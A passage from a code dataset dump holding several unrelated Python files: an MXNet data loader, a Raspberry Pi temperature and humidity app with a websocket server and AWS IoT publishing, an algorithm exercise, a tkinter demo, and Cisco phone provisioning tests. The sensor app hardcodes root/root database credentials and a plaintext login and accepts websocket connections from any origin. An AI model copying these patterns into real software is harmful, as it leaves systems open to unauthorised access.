'softmax_label',\n data_shape = cfg.image_shape,\n batch_size = cfg.batch_size,\n rand_crop = cfg.random_crop,\n # max_random_scale = cfg.max_random_scale,\n # min_random_scale = cfg.min_random_scale,\n # max_aspect_ratio = cfg.max_random_aspect_ratio,\n # random_h = cfg.max_random_h,\n # random_s = cfg.max_random_s,\n # random_l = cfg.max_random_l,\n # max_rotate_angle = cfg.max_random_rotate_angle,\n # max_shear_ratio = cfg.max_random_shear_ratio,\n rand_mirror = cfg.random_mirror,\n preprocess_threads = cfg.data_nthreads,\n shuffle = False,\n num_parts = nworker,\n part_index = rank,\n prefetch_buffer = 10)\n if cfg.data_valid is None:\n return (train, None)\n valid = mx.io.ImageRecordIter(\n path_imgrec = cfg.data_valid,\n label_width = 1,\n # mean_r = cfg.rgb_mean[0],\n # mean_g = cfg.rgb_mean[1],\n # mean_b = cfg.rgb_mean[2],\n scale=1.0 / 255,\n data_name = 'data',\n label_name = 'softmax_label',\n batch_size = cfg.batch_size,\n data_shape = cfg.image_shape,\n preprocess_threads = cfg.data_nthreads,\n rand_crop = False,\n rand_mirror = False,\n num_parts = nworker,\n part_index = rank,\n prefetch_buffer = 10)\n return (train, valid)\n\ndef get_rec_iter_test(batch_size=1):\n test = mx.io.ImageRecordIter(\n path_imgrec=cfg.data_test,\n label_width=1,\n # mean_r=cfg.rgb_mean[0],\n # mean_g=cfg.rgb_mean[1],\n # mean_b=cfg.rgb_mean[2],\n scale=1.0/255,\n data_name='data',\n # label_name='softmax_label',\n batch_size=batch_size,\n data_shape=cfg.image_shape,\n preprocess_threads=cfg.data_nthreads,\n rand_crop=False,\n rand_mirror=False)\n return test\n","sub_path":"mxm/release/googlenet/frame/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485964844","text":"\"\"\"\nInterfacing DHT22 with Rpi3\n\n@author Vipraja Patil\n\n@description\nCreated .ui files using QT GUI. Using these .ui files craeted a Python application for retrieving temperature and humidity values from DHT22 sensor which is interfaced with Rpi3 and all these values are stored in a database. This Rpi also acts as a webserver and keeps on listening for requests from the client. According to the requests appropriate data is retrieved from the database and is sent to the client. \n\n@references:\nhttps://stackoverflow.com/questions/11812000/login-dialog-pyqt\nhttps://ralsina.me/posts/BB974.html\nhttps://gist.github.com/pklaus/3e16982d952969eb8a9a#file-embedding_in_qt5-py-L14\nhttps://www.youtube.com/watch?v=7SrD4l2o-uk\nhttps://circuitdigest.com/microcontroller-projects/publish-sensor-data-to-amazon-aws-raspberry-pi-iot\n\"\"\"\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.uic import loadUi\nimport Adafruit_DHT as sensor\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom datetime import datetime, time \nimport MySQLdb\nimport tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nimport socket\nimport threading\nfrom threading import Lock\nimport time\nimport asyncio\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\n\nlock = Lock()\nclient_data = \"\"\nconnection_flag = 0\nmqtt_client = AWSIoTMQTTClient(\"Rpi\")\naws_count = 0\nhumidity = 0\nhum_avg = 0\ntemp = 0\ntemp_avg = 0\ntemp_f = 0\ntemp_f_high = 0\ntemp_f_low = 0\ntemp_avg_f = 0\n\ntemp_list = []\nhum_list = []\n#Connect to the database\ndb = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"root\", db=\"project2db\")\n# Create a Cursor object to execute queries.\ncur = db.cursor()\n# Clear database whenever we run the application\ncur.execute(\"DELETE IGNORE FROM temperatureDB\")\ndb.commit()\ncur.execute(\"DELETE IGNORE FROM humidityDB\")\ndb.commit()\n# Create tables in the database\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS humidityDB (\n count int NOT NULL AUTO_INCREMENT,\n humidity varchar(255),\n timestamp varchar(255),\n highest varchar(255),\n lowest varchar(255),\n last varchar(255),\n average varchar(255),\n PRIMARY KEY (count)\n );\"\"\")\ndb.commit();\n\ncur.execute(\"\"\"CREATE TABLE IF NOT EXISTS temperatureDB (\n count int NOT NULL AUTO_INCREMENT,\n temperature varchar(255),\n timestamp varchar(255),\n highest varchar(255),\n lowest varchar(255),\n last varchar(255),\n average varchar(255),\n PRIMARY KEY (count)\n );\"\"\")\ndb.commit()\n\n'''\nServer sends requested data to the client according to the requests by extracting appropriate data from the mysql database.\n'''\nclass WSHandler(tornado.websocket.WebSocketHandler):\n def open(self):\n print('new connection')\n \n def on_message(self, message):\n global connection_flag\n print(\"connection flag handler {}\".format(connection_flag))\n print('message received: {}'.format(message))\n lock.acquire()\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM temperatureDB ORDER BY count DESC LIMIT 1\")\n for row in cursor.fetchall():\n print(connection_flag)\n if connection_flag == 1:\n self.write_message(\"Sensor not connected;Sensor not connected\")\n else:\n if message == \"TlastC\":\n self.write_message(\"{};{}\".format(row[5],row[2]))\n elif message == \"TlastF\":\n client_data = float(row[5])\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data, row[2]))\n elif message == \"TavgC\":\n self.write_message(\"{};{}\".format(row[6],row[2]))\n elif message == \"TavgF\":\n client_data = row[6]\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n elif message == \"ThighC\":\n self.write_message(\"{}:{}\".format(row[3],row[2]))\n elif message == \"ThighF\":\n client_data = row[3]\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n elif message == \"TlowC\":\n self.write_message(\"{};{}\".format(row[4],row[2]))\n elif message == \"TlowF\":\n client_data = row[4]\n client_data = client_data * 1.8\n client_data = client_data + 32\n self.write_message(\"{};{}\".format(client_data,row[2]))\n\n cursor.execute(\"SELECT * FROM humidityDB ORDER BY count DESC LIMIT 1\")\n for row in cursor.fetchall():\n if message == \"Hlast\":\n self.write_message(\"{};{}\".format(row[5],row[2]))\n elif message == \"Havg\":\n self.write_message(\"{};{}\".format(row[6],row[2]))\n elif message == \"Hlow\":\n self.write_message(\"{};{}\".format(row[4],row[2]))\n elif message == \"Hhigh\":\n self.write_message(\"{};{}\".format(row[3],row[2]))\n lock.release()\n\n def on_close(self):\n print('connection closed')\n \n def check_origin(self, origin):\n return True\n \napplication = tornado.web.Application([\n (r'/ws', WSHandler),\n])\n\n# Class defining Login dialog\nclass Login(QDialog):\n def __init__(self, parent=None):\n super(Login, self).__init__(parent)\n loadUi('login.ui',self)\n self.setWindowTitle('Login')\n self.user.text()\n self.password.text()\n self.login_button.clicked.connect(self.login_func)\n\n def login_func(self):\n if (self.user.text() == \"vipraja\" and self.password.text() == \"vipraja\"):\n self.accept()\n else:\n self.login_result.setText('Login unsucessful')\n \n\n# Main class which initializes all the functions required for displaying sensor values\nclass project1(QDialog):\n def __init__(self, parent=None):\n super(project1,self).__init__()\n loadUi('project3.ui',self)\n self.setWindowTitle('EID project 1')\n self.temp_button = 0\n self.hum_button = 0\n self.conversion_flag = 0 # 0- Celsius, 1- Fahrenheit\n self.temp_count = 0\n self.hum_count = 0\n \n global mqtt_client\n mqtt_client.configureEndpoint(\"a2jpudmlrkrlqa-ats.iot.us-east-2.amazonaws.com\", 8883)\n mqtt_client.configureCredentials(\"AmazonRootCA1.pem\", \"079f36358a-private.pem.key\",\"079f36358a-certificate.pem.crt\")\n mqtt_client.configureAutoReconnectBackoffTime(1, 32, 20)\n mqtt_client.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\n mqtt_client.configureDrainingFrequency(2) # Draining: 2 Hz\n mqtt_client.configureConnectDisconnectTimeout(10) # 10 sec\n mqtt_client.configureMQTTOperationTimeout(5) \n\n mqtt_client.connect()\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n time = QTime.currentTime()\n self.temp_threshold.text()\n self.hum_threshold.text()\n self.refresh_temp.clicked.connect(self.temp_refresh_clicked)\n self.refresh_hum.clicked.connect(self.humidity_refresh_clicked)\n self.conversion_button.clicked.connect(self.conversion_clicked)\n self.get_temp()\n self.get_hum()\n self.aws_data()\n \n\n @pyqtSlot()\n # Celcius to Fahreinheit\n def conversion(self, temp):\n temp = temp * 1.8\n temp = temp + 32\n return temp\n\n # Displays temperature values, allows user to enter threshold value and gives an alert accordingly\n # Store temperature values in the database\n def get_temp(self):\n global connection_flag\n global mqtt_client\n global aws_count, temp, temp_avg, temp_f, temp_avg_f, temp_f_high, temp_f_low \n try:\n time = QTime.currentTime()\n humidity,temp = sensor.read(sensor.DHT22, 4)\n if temp is None or humidity is None:\n self.temp_value.setText('ERROR')\n print(\"*************Connection removed*************\")\n connection_flag = 1\n else:\n connection_flag = 0\n self.temp_count = self.temp_count + 1\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n temp_list.append(round(temp,4))\n print('{} count:{}'.format(temp,self.temp_count))\n tstr = self.temp_threshold.text()\n if not tstr:\n t = 26\n else:\n t = int(tstr)\n if self.temp_button == 1:\n if self.conversion_flag == 1:\n temp = temp * 1.8\n temp = temp + 32\n tstr = self.temp_threshold.text()\n if temp > (t*1.8)+32:\n self.alarm_temp.setText('ALERT HIGH TEMP')\n else:\n self.alarm_temp.setText('')\n self.temp_value.setText('{} F'.format(round(temp,4)))\n else:\n if temp > t:\n self.alarm_temp.setText('ALERT HIGH TEMP')\n else:\n self.alarm_temp.setText('')\n\n self.temp_value.setText('{} C'.format(round(temp,4)))\n self.temp_time.setText(self.today)\n self.temp_button = 0\n\n temp_avg = 0\n temp_list_count = 0;\n for i in temp_list:\n temp_avg = i + temp_avg\n temp_list_count = temp_list_count + 1\n temp_avg = temp_avg/temp_list_count\n if self.conversion_flag == 1:\n temp_avg_f = temp_avg\n temp_avg_f = temp_avg_f * 1.8\n temp_avg_f = temp_avg_f + 32\n\n temp_f = self.conversion(round(temp, 2))\n temp_f_high = self.conversion(max(temp_list))\n temp_f_low = self.conversion(min(temp_list))\n temp_avg_f = self.conversion(temp_avg)\n aws_count = aws_count + 1\n\n if (self.temp_count%8) == 0:\n if self.conversion_flag == 1:\n self.last_temp_label.setText('Last value: {} F'.format(round(temp,2))) \n self.avg_temp_label.setText('Average: {} F'.format(round(temp_avg_f,2))) \n self.high_temp_label.setText('Highest: {} F'.format(round(temp_f_high,2))) \n self.low_temp_label.setText('Lowest: {} F'.format(round(temp_f_low,2))) \n else:\n self.last_temp_label.setText('Last value: {} C'.format(round(temp,2)))\n self.avg_temp_label.setText('Average: {} C'.format(round(temp_avg,2)))\n self.high_temp_label.setText('Highest: {} C'.format(round(max(temp_list),2)))\n self.low_temp_label.setText('Lowest: {} C'.format(round(min(temp_list),2)))\n \n # print timestamp\n self.last_temp_time.setText('Time: {}'.format(self.today))\n self.avg_temp_time.setText('Time: {}'.format(self.today))\n self.high_temp_time.setText('Time: {}'.format(self.today))\n self.low_temp_time.setText('Time: {}'.format(self.today))\n \n #send data to aws cloud\n '''\n temp_message = \"TempC;\"+str(round(temp,2))+\";\"+str(round(max(temp_list),2))+\";\"+str(round(min(temp_list),2))+\";\"+str(round(temp_avg,2))+\";\"+self.today+\";\"\n print(\"{}\".format(temp_message))\n mqtt_client.publish(\"RpiPolicy\", temp_message, 0)\n temp_message = \"TempF;\"+str(round(temp_f,2))+\";\"+str(round(temp_f_high,2))+\";\"+str(round(temp_f_low,2))+\";\"+str(round(temp_avg_f,2))+\";\"+self.today+\";\"\n print(\"{}\".format(temp_message))\n mqtt_client.publish(\"RpiPolicy\", temp_message, 0)'''\n \n global cur\n lock.acquire()\n cur = db.cursor()\n #insert values in data base\n insert_statement = \"INSERT INTO temperatureDB (temperature, highest, lowest, average, last, timestamp) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (temp, max(temp_list), min(temp_list), temp_avg, temp, self.today)\n cur.execute(insert_statement, val)\n db.commit()\n cur.execute(\"SELECT * FROM temperatureDB\")\n db.commit()\n print(cur.rowcount, \"record inserted.\")\n lock.release()\n \n finally:\n self.temp_button = 0\n QTimer.singleShot(5000, self.get_temp)\n\n\n # Displays humidity values, allows user to enter threshold value and gives an alert accordingly\n # Store humidity values in the databse\n def get_hum(self):\n global mqtt_client\n global aws_count, humidity, hum_avg\n try:\n time = QTime.currentTime()\n self.today = datetime.now().strftime(\"%H:%M:%S %Y-%m-%d\")\n humidity,temp = sensor.read(sensor.DHT22, 4)\n if temp is None or humidity is None:\n self.hum_value.setText('ERROR')\n connection_flag = 1\n print(\"***********Connection removed**************\")\n else:\n connection_flag = 0\n self.hum_count = self.hum_count + 1\n if self.hum_button == 1:\n self.hum_value.setText('{} %'.format(round(humidity,4)))\n self.hum_time.setText(time.toString(Qt.DefaultLocaleLongDate))\n self.hum_button = 0\n hstr = self.hum_threshold.text()\n if not hstr:\n h = 50\n else:\n h = int(hstr) \n if humidity > h:\n self.alarm_hum.setText('ALERT HIGH HUM')\n else:\n self.alarm_hum.setText('')\n hum_avg = 0\n hum_list_count = 0\n hum_list.append(round(humidity,4))\n ws_count = aws_count + 1\n for i in hum_list:\n hum_avg = i + hum_avg\n hum_list_count = hum_list_count + 1\n hum_avg = hum_avg/hum_list_count\n\n #send data to aws cloud\n #hum_message = \"Hum;\"+str(round(humidity,2))+\";\"+str(round(max(hum_list),2))+\";\"+str(round(min(hum_list),2))+\";\"+str(round(hum_avg,2))+\";\"+self.today+\";\"\n #print(\"{}\".format(hum_message))\n #mqtt_client.publish(\"RpiPolicy\", hum_message, 0)\n\n if (self.hum_count%8 == 0):\n self.last_hum_label.setText('Last value: {} %'.format(round(humidity,2)))\n self.avg_hum_label.setText('Average: {} %'.format(round(hum_avg,2)))\n self.high_hum_label.setText('Highest: {} %'.format(round(max(hum_list),2)))\n self.low_hum_label.setText('Lowest: {} %'.format(round(min(hum_list),2)))\n self.last_hum_time.setText('Time: {}'.format(self.today))\n self.avg_hum_time.setText('Time: {}'.format(self.today))\n self.high_hum_time.setText('Time: {}'.format(self.today))\n self.low_hum_time.setText('Time: {}'.format(self.today))\n \n\n global cur\n lock.acquire()\n #insert values in data base\n insert_statement = \"INSERT INTO humidityDB (humidity, highest, lowest, average, last, timestamp) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (humidity, max(hum_list), min(hum_list), hum_avg, humidity, self.today)\n cur.execute(insert_statement, val)\n db.commit()\n lock.release()\n # cur.execute(\"SELECT * FROM humdidityDB\")\n\n finally:\n self.hum_button = 0\n QTimer.singleShot(5000, self.get_hum)\n\n # Whenever temeprature refresh button is pressed this function is called. This function then calls get_temp()\n # for displaying the temperature value\n def temp_refresh_clicked(self):\n self.temp_button = 1\n time = QTime.currentTime()\n self.get_temp()\n\n # Whenever humidity refresh button is pressed this function is called. This function then calls get_hum()\n # for displaying the humidity value\n def humidity_refresh_clicked(self):\n self.hum_button = 1\n time = QTime.currentTime()\n self.get_hum()\n\n # This function is called whenever the user needs to switch between units Celsius and Fahreinheit\n def conversion_clicked(self):\n self.conversion_flag = 1 - self.conversion_flag\n \n def aws_data(self):\n global temp, temp_avg, temp_f, temp_avg_f, temp_f_high, temp_f_low, humidity, hum_avg\n\t\t\t\n try:\n if (aws_count > 2 and temp is not None and humidity is not None):\n message = \"{\\\"time\\\": \\\"\"+self.today+\"\\\",\\\"TClast\\\":\\\"\"+str(round(temp,2))+\"\\\",\\\"TCavg\\\":\\\"\"+str(round(temp_avg,2))+\"\\\",\\\"TChigh\\\":\\\"\"+str(round(max(temp_list),2))+\"\\\",\\\"TClow\\\":\\\"\"+str(round(min(temp_list),2))+\"\\\",\\\"TFlast\\\":\\\"\"+str(round(temp_f))+\"\\\",\\\"TFavg\\\":\\\"\"+str(round(temp_avg_f))+\"\\\",\\\"TFhigh\\\":\\\"\"+str(round(temp_f_high))+\"\\\",\\\"TFlow\\\":\\\"\"+str(round(temp_f_low))+\"\\\",\\\"Hlast\\\":\\\"\"+str(round(humidity,2))+\"\\\",\\\"Havg\\\":\\\"\"+str(round(hum_avg,2))+\"\\\",\\\"Hhigh\\\":\\\"\"+str(round(max(hum_list),2))+\"\\\",\\\"Hlow\\\":\\\"\"+str(round(min(hum_list),2))+\"\\\"}\"\n print(\"{}\".format(message))\n mqtt_client.publish(\"RpiPolicy\", message, 0)\n finally:\n QTimer.singleShot(5000, self.aws_data)\n\n'''\nThis thread is created for running the server side by side with the QT application. This is called after successful \nlogin. Server keeps on listening for requests continuously.\n'''\ndef thread1():\n asyncio.set_event_loop(asyncio.new_event_loop())\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(8888)\n myIP = socket.gethostbyname(socket.gethostname())\n print ('*** Websocket Server Started at %s***' % myIP)\n while True:\n tornado.ioloop.IOLoop.instance().start()\n\nt = threading.Thread(name=\"thread1\", target=thread1)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n login = Login()\n\n if login.exec_() == QtWidgets.QDialog.Accepted:\n widget = project1()\n widget.show()\n t.daemon = True\n t.start()\n sys.exit(app.exec_())\n \n\n","sub_path":"3_project/server/project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":19449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"227769847","text":"#no\nimport bisect\nimport sys\nlines = sys.stdin.readlines()\nN, M = list(map(int, lines[0].strip().split()))\nD_P = {}\nfor line in lines[1:-1]:\n if not line.strip().split():\n continue\n a,b=map(int,line.strip().split())\n D_P.update({a:b})\narr = sorted(D_P.keys())\nfor j in range(1,len(arr)):\n if D_P[arr[j]] < D_P[arr[j-1]]:\n D_P[arr[j]] = D_P[arr[j-1]]\nAi = map(int,lines[-1].strip().split())\nfor a in Ai:\n inds = bisect.bisect(arr, a)\n if inds == 0:\n print(0)\n else:\n print(D_P[arr[inds-1]])\n'''了找到自己满意的工作,牛牛收集了每种工作的难度和报酬。牛牛选工作的标准是在难度不超过自身能力值的情况下,牛牛选择报酬最高的工作。在牛牛选定了自己的工作后,牛牛的小伙伴们来找牛牛帮忙选工作,牛牛依然使用自己的标准来帮助小伙伴们。牛牛的小伙伴太多了,于是他只好把这个任务交给了你。\n输入描述:\n每个输入包含一个测试用例。\n每个测试用例的第一行包含两个正整数,分别表示工作的数量N(N<=100000)和小伙伴的数量M(M<=100000)。\n接下来的N行每行包含两个正整数,分别表示该项工作的难度Di(Di<=1000000000)和报酬Pi(Pi<=1000000000)。\n接下来的一行包含M个正整数,分别表示M个小伙伴的能力值Ai(Ai<=1000000000)。\n保证不存在两项工作的报酬相同。\n输出描述:\n对于每个小伙伴,在单独的一行输出一个正整数表示他能得到的最高报酬。一个工作可以被多个人选择。'''","sub_path":"笔试面试题/公司牛客刷题/最大最小等/牛牛找工作.py","file_name":"牛牛找工作.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"76483347","text":"from tkinter import *\n\ndef show_options():\n options.set(\"{} aged {}.\".format(gender.get(), agerange.get()))\n\nwindow = Tk()\nwindow.title(\"Providing options with radiobuttons\")\nwindow.geometry(\"700x140\")\n\nframe_gender = Frame(window, bg=\"lightgray\")\nframe_gender.place(x=10, y=10)\nframe_agerange = Frame(window, bg=\"lightgray\")\nframe_agerange.place(x=120, y=10)\n\nbtn_select = Button(window, text=\"Select\", command=show_options)\nbtn_select.place(x=10, y=80)\ngender = StringVar()\n\nrad_female = Radiobutton(frame_gender, text=\"Female\", value=\"Female\", variable=gender, bg=\"lightgray\")\nrad_female.pack(side=TOP, anchor=W)\nrad_male = Radiobutton(frame_gender, text=\"Male\", value=\"Male\", variable=gender, bg=\"lightgray\")\nrad_male.pack(side=TOP, anchor=W)\nrad_female.select()\nagerange = StringVar()\n\nrad_under18 = Radiobutton(frame_agerange, text=\"Under 18\", value=\"under 18\", variable=agerange, bg=\"lightgray\")\nrad_under18.pack(side=TOP, anchor=W)\nrad_18to30 = Radiobutton(frame_agerange, text=\"18 to 30\", value=\"18 to 30\", variable=agerange, bg=\"lightgray\")\nrad_18to30.pack(side=TOP, anchor=W)\nrad_over30 = Radiobutton(frame_agerange, text=\"Over 30\", value=\"over 30\", variable=agerange, bg=\"lightgray\")\nrad_over30.pack(side=TOP, anchor=W)\nrad_18to30.select()\n\noptions = StringVar()\nshow_options()\n\nlbl_options = Label(window, textvariable=options)\nlbl_options.place(x=10, y=110)\nwindow.mainloop()","sub_path":"radiobuttonsscript.py","file_name":"radiobuttonsscript.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380225889","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmPROV_3pcc_provisioning_rule.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nReferences:\n Tph10084990c\n Tph10084992c\n Tph10084993c\n\nTest Cases:\n test01_GPP_A\n test02_GPPa_UserPwd_GPPsd\n test03_GPPa_UserPwd_GPPsa\n\nTopology:\n 1. 1 3pcc phone\n 2. 1 http server\n 3. 1 tftp server\n 4. 1 https server\n\nNotes:\n\nKonow bugs:\n\n\"\"\"\n\nimport tng\nimport re\nimport logging\nimport urllib\nfrom tng.frontend.timing import wait, until, retry\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_config_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\n\nlog = logging.getLogger('ProvisionWithHttpTftp')\n\n\nclass ProvisionWithHttpTftp(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper, PhoneLineRegHelper)\n helper_num_devices = 1\n\n serverIP = '1.1.1.1'\n GPP_A_value = 'aaaa'\n User_Password = '1234'\n GPP_SD_value = 'abcd'\n GPP_SA_value = 'abcd'\n macrostr = '/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD'\n port = {'http': '80', 'tftp': '69', 'https': '443'}\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n # clean user password\n def clean_UserPassword():\n cls.oPhone1.ui.set_param_value({'User Password': ''})\n\n cls.addCleanupClass(clean_UserPassword)\n\n log.info(\"End of setUpClass\")\n\n def get_resync_index_from_status(self):\n resync_status = self.oPhone1.ui.get_param_value(\n 'Provisioning Status 1')\n resync_id = int(re.findall(r'\\d+', resync_status)[0])\n return resync_id\n\n def check_macro_is_configure(self, protype, port, resync_index):\n log.info(\"Start of check_macro_is_configure\")\n\n status_str = self.oPhone1.ui.get_param_value('Provisioning Status 1')\n log.info(\"Provisioning Status 1: %s\", status_str)\n\n final_str = (\n '{}{}:{}/{}.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD]Resync Failed'.format(\n protype, self.serverIP, self.port[port], self.GPP_A_value))\n checks = [\"[{}]\".format(resync_index), final_str]\n\n return all([chk in status_str for chk in checks])\n\n def check_macro_is_condition(self, prefix_str, protype, resync_index):\n log.info(\"Start of check_macro_is_condition\")\n\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': prefix_str + protype + self.serverIP + '/$A.xml'\n })\n status_str = self.oPhone1.ui.get_param_value('Provisioning Status 1')\n log.info(\"Provisioning Status 1: %s\", status_str)\n\n final_str = ('Resync Failed. Reason: Error - Parse error in rule')\n checks = [\"[{}]\".format(resync_index), final_str]\n\n return all([chk in status_str for chk in checks])\n\n def check_macro_next_index(self, *args):\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n myargs = list(args) + [resync_index]\n until(\n self.check_macro_is_condition, args=tuple(myargs), timeout=10,\n raise_msg=\"Expanded ERROR: {!r}\".format(myargs)\n )\n\n # ==================Group Provision With Http & Tftp==========\n # TIMS ID: Tph10084990c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. create configuration file as a.xml\n # aaaa\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # http://test.com/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n # 5. Edit the profile as below\n # tftp://test.com/$A.xml?&mpwd=$MPWD&key=$SA\n # 6. Go to WEB gui:\n # http://phoneIP/admin/resync?\\\n # http://test.com/$A.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n #\n # Expected Result:\n # After step 4 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the http server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n # After step 5 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the tftp server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA\n # After step 6 check: $MPWD,$PWD,$SA is not expanded\n # 1. Check the http server log, the request rul is :\n # /aaaa.xml?&mpwd=$MPWD&key=$SA&pwd=$PWD\n\n def test01_GPP_A(self):\n log.info(\"Start of test01_GPP_A\")\n\n self.oPhone1.ui.set_param_value({'GPP A': self.GPP_A_value})\n # step 4\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': 'http://' + self.serverIP + self.macrostr\n })\n\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('http://', 'http', resync_index),\n timeout=20,\n raise_msg=\"Expanded ERROR\")\n # step 5\n self.oPhone1.ui.set_param_value({\n 'Profile Rule': 'tftp://' + self.serverIP + self.macrostr\n })\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('tftp://', 'tftp', resync_index),\n timeout=35,\n raise_msg=\"Expanded ERROR\")\n # step 6\n final_rule = 'http://' + self.serverIP + self.macrostr\n urllib.urlopen('http://{}/admin/resync?{}'.format(\n self.oPhone1.ip, final_rule))\n\n resync_index = (self.get_resync_index_from_status() + 1) % 65536\n until(\n self.check_macro_is_configure,\n args=('http://', 'http', resync_index),\n timeout=40,\n raise_msg=\"Expanded ERROR\")\n\n log.info(\"End of test01_GPP_A\")\n\n # TIMS ID: Tph10084992c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. create configuration file as a.xml\n # aaaa\n # 1234\n # abcd\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # (\"$MPWD\"==\"\")?http://test.com/$A.xml\n # 5. Edit the profile as below\n # (\"$MPWD\"==\"\")?https://test.com/$A.xml\n # 6. Edit the profile as below\n # (\"$MPWD\"==\"\")?tftp://test.com/$A.xml\n #\n # Expected Result:\n # After step 4,5,6check:\n # 1. Go to the web->Debug Info,check the phone's message:\n # Condition not met.$MPWD not expanded,$A is expanded\n\n def test02_GPPa_UserPwd_GPPsd(self):\n log.info(\"Start of test02_GPPa_UserPwd_GPPsd\")\n\n self.oPhone1.ui.set_param_value({\n 'GPP A': self.GPP_A_value,\n 'User Password': self.User_Password,\n 'GPP SD': self.GPP_SD_value\n })\n prefix_str = '(\"$MPWD\"==\"\")?'\n # step 4\n self.check_macro_next_index(prefix_str, 'http://')\n\n # step 5\n self.check_macro_next_index(prefix_str, 'https://')\n\n # step 6\n self.check_macro_next_index(prefix_str, 'tftp://')\n\n log.info(\"End of test02_GPPa_UserPwd_GPPsd\")\n\n # TIMS ID: Tph10084993c\n # Author: Chen Yu (chenyu2@cisco.com)\n # Description and Test Steps:\n # SetUp\n # 1. Setup a http and tftp server(eg.test.com)\n # 2. create configuration file as a.xml\n # aaaa\n # 1234\n # abcd\n # 3.Go to web->admin/advanved->Profile Rule=\n # http://provisioning_server/a.xml\n # 4. Go to WEB GUI admin/advanved->System-> Debug Level = DEBUG\n #\n # Procedure\n # 1.Open WEB GUI\n # 2.Go to admin/advanved page Provisioning tab\n # 3. Go to profile rule\n # 4. Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?http://test.com/$A.xml\n # 5. Edit the profile as below\n # (\"$SA\"==\"aaaa\")?http://test.com/$A.xml\n # 6. Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?https://test.com/$A.xml\n # 7. Edit the profile as below\n # (\"$SA\"==\"aaaa\")?https://test.com/$A.xml\n # 8.Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?tftp://test.com/$A.xml\n # 9. Edit the profile as below\n # (\"$SA\"==\"aaaa\")?tftp://test.com/$A.xml\n #\n # Expected Result:\n # After step 4-9 check:\n # 1. Go to the web->Debug Info,check the phone's message:\n # Condition not met.$PWD,$SA are not expanded\n\n def test03_GPPa_UserPwd_GPPsa(self):\n log.info(\"Start of test03_GPPa_UserPwd_GPPsa\")\n\n PWDstr = '(\"$PWD\"==\"aaaa\")?'\n SAstr = '(\"$SA\"==\"aaaa\")?'\n self.oPhone1.ui.set_param_value({\n 'GPP A': self.GPP_A_value,\n 'User Password': self.User_Password,\n 'GPP SA': self.GPP_SA_value\n })\n\n # step 4\n self.check_macro_next_index(PWDstr, 'http://')\n\n # step 5\n self.check_macro_next_index(SAstr, 